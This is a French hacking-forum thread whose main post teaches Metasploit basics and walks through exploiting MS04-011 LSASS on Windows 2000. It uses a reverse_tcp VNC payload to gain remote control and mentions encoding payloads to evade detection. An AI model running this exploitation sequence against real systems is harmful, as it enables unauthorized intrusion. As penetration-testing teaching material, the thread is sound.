Metasploit, les bases et exploitation
|
02-11-2011, 15h32
(Modification du message : 16-10-2012, 20h26 par CyberSee.)
Message : #1
|
|
itcef
Membre actif Messages : 77 Sujets : 4 Points: 2 Inscription : Oct 2011 |
Metasploit, les bases et exploitation
Bonjour tous le monde, dans ce tutoriel on va apprendre comment utiliser Metasploit ! avec exemple d'exploitation d'une faille
Bien sûr, il y a un début à tout, donc je vous ferai une petite introduction. I - Introduction Alors comme certains le savent déjà, Metasploit était un projet Open Source basé sur la sécurité informatique censé fournir des informations sur les différentes vulnérabilités, et aidant à la pénétration des systèmes informatiques, cependant il y avait un sous-projet connu sous le nom de Metasploit Framework un outil pour le développement et l'exécution d'exploits contre une machine distante. Voici le lien pour télécharger Metasploit : http://metasploit.com/download/ /!\ Pour ceux qui ne savent pas installer Metasploit sur GNU/Linux: /!\ Installation des dépendances sur une distribution Debian: Code : sudo apt-get install build-essential subversion ruby libruby irb rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev Installation des dépendances sur une distribution comme Fedora qui utilise des RPMs: Code : yum install subversion ruby ruby-libs ruby-devel ruby-irb ruby-rdoc readline rubygems ruby-sqlite3 Pour exécuter Metasploit, on va dans le dossier d'installation et on tape: Code : ./msfconsole II - Les étapes Voici les étapes basiques que vous devez connaître pour la pénétration d'un système: 1 - On choisit l'exploit, on le configure et on vérifie si le système distant est vulnérable à cet exploit. 2 - On choisit un payload, on le configure ( c'est une sorte de code qui s’exécutera au moment ou l'on pénètre le système distant ). 3 - Encodage du payload, pour le rendre indétectable. 4 - Et bien sûr l’exécution de l'exploit III - Les commandes de bases à connaître use <chemin/vers/exploit> Sélection d'un exploit ou un auxiliaire show options Affiche la liste des options. show payloads Liste les payloads disponibles. show exploits Liste les exploits disponibles. set <variable> <valeur> permet d'attribuer une valeur à une variable, par exemple: set RHOST 192.168.1.2 (Remote Host) Ip distante set RPORT 85 (Remote Port) Port distant show targets Liste les cibles search <RealVNC> Recherche un exploit, ici on recherche un exploit pour RealVNC Hint: L'autocompletion avec la touche TAB est disponible. Exemples: On va utiliser le module udp_sweep pour la découverte d'hôtes comme suit: Code : msf > use auxiliary/scanner/discovery/udp_sweep On lance avec la cmd run après avoir spécifié la plage d'IPs distantes avec set RHOSTS xxx.xxx.xxx.xxx/xxx Ce qui vous donne les noms, adresses MACs de toutes les machines scannées. Un autre exemple avec le module smb_version pour nous donner le nom du système installé sur l'hôte choisi: Code : msf auxiliary(udp_sweep) > use auxiliary/scanner/smb/smb_version Pour le deuxième hôte: Code : msf auxiliary(udp_sweep) > use auxiliary/scanner/smb/smb_version IV - Exemple d'exploitation Dans cet exemple on exploitera une vulnérabilité du service LSASS dans Windows 2000 Pro pour charger une DLL dans laquelle est encapsulé un serveur VNC. On ouvre une console Metasploit: Code : ./msfconsole On va exploiter la vulnérabilité ms04_011_lsass: Code : msf > use exploit/windows/smb/ms04_011_lsass On spécifie l'hôte distant: Code : msf exploit(ms04_011_lsass) > set RHOST 192.168.1.4 Le payload à utiliser: Code : msf exploit(ms04_011_lsass) > set PAYLOAD windows/vncinject/reverse_tcp On configure le payload pour lui indiquer notre adresse IP: Code : msf exploit(ms04_011_lsass) > set LHOST 192.168.1.3 On peut toujours consulter notre configuration: Code : msf exploit(ms04_011_lsass) > show options On spécifie le port d'écoute LOCAL: Code : msf exploit(ms04_011_lsass) > set LPORT 4321 On spécifie la cible, par défaut c'est 0 ce qui signifie que c'est automatique 1: Windows 2000 English 2: Windows XP English Donc nous on choisit 1 Code : msf exploit(ms04_011_lsass) > set TARGET 1 Enfin on lance l'exploit ! :heink: Code : msf exploit(ms04_011_lsass) > exploit Si tout a fonctionné correctement vous aurez normalement une fenêtre VNC pointant sur l'hôte distant POWNED ! ----------------------------- Tutoriel écrit par Itcef. Libre à vous d'en faire ce que vous voulez
Mieux vaut être faux que vrai.
|
|
02-11-2011, 21h08
(Modification du message : 01-04-2012, 00h48 par Di0Sasm.)
Message : #2
|
|
CyberSee
Admin fondateur de N-PN Messages : 1,721 Sujets : 287 Points: 158 Inscription : Jan 2012 |
Metasploit les bases et exploitation
Bravo itcef :-)
Là tu mérites définitivement 20 de réputation de plus lol Bien jouer :-) |
|
21-02-2012, 23h37
Message : #3
|
|
S3TuP
Membre Messages : 39 Sujets : 2 Points: 2 Inscription : Feb 2012 |
RE: Metasploit les bases et exploitation
C'est un trés bon tutoriel ! Merci
|
|
22-02-2012, 17h10
Message : #4
|
|
Dobry
Tueur de lamouz Messages : 206 Sujets : 25 Points: 73 Inscription : Aug 2011 |
RE: Metasploit les bases et exploitation
Merci pour ce tutoriel, notamment sur le scan d'hosts que je ne connaissais pas.
Aestuārium Erudītiōnis
There are only two hard things in Computer Science: cache invalidation, naming things, and off-by-one errors.
|
|
04-06-2014, 13h21
Message : #5
|
|
kaligreycat
Newbie Messages : 3 Sujets : 1 Points: 0 Inscription : Jun 2014 |
RE: Metasploit, les bases et exploitation
Très bon tuto bien expliquez.
Merci beaucoup. |
|
25-09-2014, 22h51
Message : #6
|
|
The_Dark_Line
System.out.printf("Hello Word"); Messages : 10 Sujets : 2 Points: 3 Inscription : Sep 2014 |
RE: Metasploit, les bases et exploitation
Bonsoir,
Code : sudo apt-get install build-essential subversion ruby libruby irb rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev Je tient juste a signaler que cette commande d'installe ne marche plus ... J'ai quand même trouver msf sur 01.net mais pour les prochains ce serrai bien de changer la commande Bonne soirée |
|
25-09-2014, 22h54
Message : #7
|
|
supersnail
Éleveur d'ornithorynques Messages : 1,614 Sujets : 72 Points: 466 Inscription : Jan 2012 |
RE: Metasploit, les bases et exploitation
En même temps pour un tuto qui date de 3 ans, ça a le temps de changer
Malheureusement, on a pas d'armée de petits chinois qui traquent toutes les modifications de commande d'installation pour mettre à jour les tutos en conséquence, m'enfin si tu te proposes gentiment, why not :]
Mon blog
Code : push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp "VIM est merveilleux" © supersnail |
|
25-09-2014, 23h11
Message : #8
|
|
The_Dark_Line
System.out.printf("Hello Word"); Messages : 10 Sujets : 2 Points: 3 Inscription : Sep 2014 |
RE: Metasploit, les bases et exploitation
J'avais pas vu la date, mais effectivement
Et ça serais avec plaisir, mais je fais comment pour modifier sont post ? |
|
25-09-2014, 23h25
Message : #9
|
|
supersnail
Éleveur d'ornithorynques Messages : 1,614 Sujets : 72 Points: 466 Inscription : Jan 2012 |
RE: Metasploit, les bases et exploitation
Tu peux envoyer un MP à un admin avec la correction à effectuer par exemple
Mon blog
Code : push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp "VIM est merveilleux" © supersnail |
|
25-09-2014, 23h26
Message : #10
|
|
The_Dark_Line
System.out.printf("Hello Word"); Messages : 10 Sujets : 2 Points: 3 Inscription : Sep 2014 |
RE: Metasploit, les bases et exploitation
Mdr c'est pas con ça
|
|
« Sujet précédent | Sujet suivant »
|
Sujets apparemment similaires… | |||||
Sujet | Auteur | Réponses | Affichages | Dernier message | |
Buffer overflow, Votre première exploitation | fr0g | 18 | 6,423 |
02-11-2016, 21h24 Dernier message: hackline |
|
Comment utiliser Metasploit | EpicOut | 4 | 1,526 |
15-09-2012, 20h47 Dernier message: Swissky |
Utilisateur(s) parcourant ce sujet : 2 visiteur(s)